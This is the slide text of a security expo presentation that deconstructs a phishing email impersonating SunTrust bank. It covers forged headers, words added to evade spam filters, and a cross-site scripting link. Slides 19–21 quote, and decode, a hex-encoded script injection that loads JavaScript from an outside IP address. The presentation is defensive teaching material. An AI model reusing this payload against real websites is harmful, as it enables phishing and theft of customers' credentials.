Taking apart a JAVA script phishing email. Part of a presentation @ Secureworld expo

1. Deconstructing A Phishing Scheme Christopher Duffy, CISSP

2. Agenda Definition Examples Breakdown Follow Through Statistics Sites

3. Defined "phishing is a criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication.“ -Wikipedia

6. Catching a Phish Complete Attack 1st effort to use clients as relay Cross- Site Scripting Attack email was not sent from the bank. e web page it linked to contained extra characters in the URL address line - added on to the bank’s legitimate web address page was hosted by the bank’s servers, overlaid it with altered elements to give the appearance of a legitimate “Account Verification” page.

7. Email Breakdown Header Info Incorrect Return Address Return-Path: billing@suntrust.com The return address is generated from the From: address and applied by the final SMTP server to handle the message. Most scams forge the From: address. This can be the only obfuscation a phisher employs; forging From: headers is a trivial task, and is often a feature of normal client mail user agents.

8. True Received: Header Received: from jeannedarc-2-82-67-84-75.fbx.proxad.net (82.67.84.75) Received: headers are written in reverse; in this case, 82.67.84.75 is the last SMTP server to handle the message before the final destination. As such, it is the only trustworthy Received: information, and is in fact the true source of the message. 82.67.84.75 is a node in a French consumer ISP, and is likely a home PC previously compromised by the phisher

9. Forged Received: Header Received: from smtp-harpsichord.poland.billing@suntrust.com ([82.67.84.75]) by b68ky1.billing@suntrust.com with Microsoft SMTPSVC(5.0.4416.5263) This Received: line is forged. Some anti-spam software will trust the Received: headers as a means of authenticating the source of the message, so adding extra Received:’s is an anti-spam evasion technique. Additional Evidence that this is a forgery is the fact that the IP address is identical to the address in the true Received: header. Also notice the presence of the “billing@suntrust.com” string in the fake server name; normal server names cannot have @-signs in their name. The names include the random dictionary words “harpsichord” and “poland” in an effort to evade Bayesian spam.

10. Incorrect Time Stamp Tue, 12 Nov 2008 07:12:03 -0100 Timestamp Most LikelyFrom a Comprimised PC (Out of SyncClock)

11. Forged From: Name and Address From: Suntrust Billing Departmentbilling@suntrust.com the forged From: field is reflected in the Return-Path field Most Likely a True email within Suntrust Impersonal To: Name, if Any To: Valued Suntrust Customer ,or To:emailname@isp.com No Salutation

12. Threats Account Compromised Suspension Upgrades in the Name of Security Colorado Business Bank has registered our secure Web sites with VeriSign and use VeriSign Server IDs.VeriSign Server IDs enable you to verify the authenticity of our secure Web site and to communicate with our Web site securely via SSL (Secure Sockets Layer) encryption.Proceed to customer service department>>

13. No RTF HTML-only message Content-Type: text/html; Delivered in HTML only, no RTF, or plain text. Mail User Agent (MUA) Compatibility

14. What??? Spurious Random Words Content-Description: lonesome hysteria ulterior Randomizer to avoid Bayesian Spam Filters

16. Linked Directly to Site

18. XSS Cross Site Scripting Attacks Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it.

19. XSS Deconstruction <a title=3D"http://suntrust.com/" target=3D"_blank" herf=3D"http://www.sun= trust.com/onlinestatements/index.asp?AccountVerify=3Ddf4g653432fvfdsGFSg45= wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=3D%22%3E%3Cscript+language=%3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E">click here</a> to confirm you=r bank account records. <br> SCREEN TIP TARGET OBSFUCATION <a title=3D"http://suntrust.com/" target=3D"_blank“ Mouse Over to distract from real target link

20. XSS Payload Link to True Site herf=3D"http://www.sun= trust.com/onlinestatements/index.asp?AccountVerify=3Ddf4g653432fvfdsGFSg45= Link target is Suntrust, following is XSS Payload (HEX) wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=3D%22%3E%3Cscript+language=%3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E">click here</a>

21. HEX DeCoded Hex-encoded HTTP parameters string. Decoded, it reads "><SCRIPTlanguage=javascriptsrc="http://218.103.23.138:8081/sun/sun.js"</SCRIPT> Link Executes sun.js 218.103.23.138 Resolves to ISP in Hong Kong

22. Top Phishing Keyloggers & Maclious Code, up 93% from ’07 ISP’s IRS

23. Mitigation Through Education Don’t click to Follow Don’t trust Links No Personal Information via email Check out the URL Let your Fingers Do the Walking Type it In !

24. SecurityCartoon.com

25. More Information Internet Crime Center www.ic3.gov Identity Theft: What to do if It Happens to You http://www.privacyrights.org/fs/fs17a.htm Federal Trade Commission phishing information http://www.ftc.gov/bcp/conline/pubs/alerts/phishingalrt.htm Video tutorial on phishing: http://www.pcsecuritysecrets.com/tips/media-chase_bank_fraud_and_phising.php Microsoft Phishing Information Website http://www.microsoft.com/protect/yourself/phishing/identify.mspx

26. Anti-Phishing Non Profit Sites www.antiphishing.org www.apwg.com www.bestsecuritytips.com www.cyberstreet.org Carnigie Mellon University Game http://cups.cs.cmu.edu/antiphishing_phil/new/index.html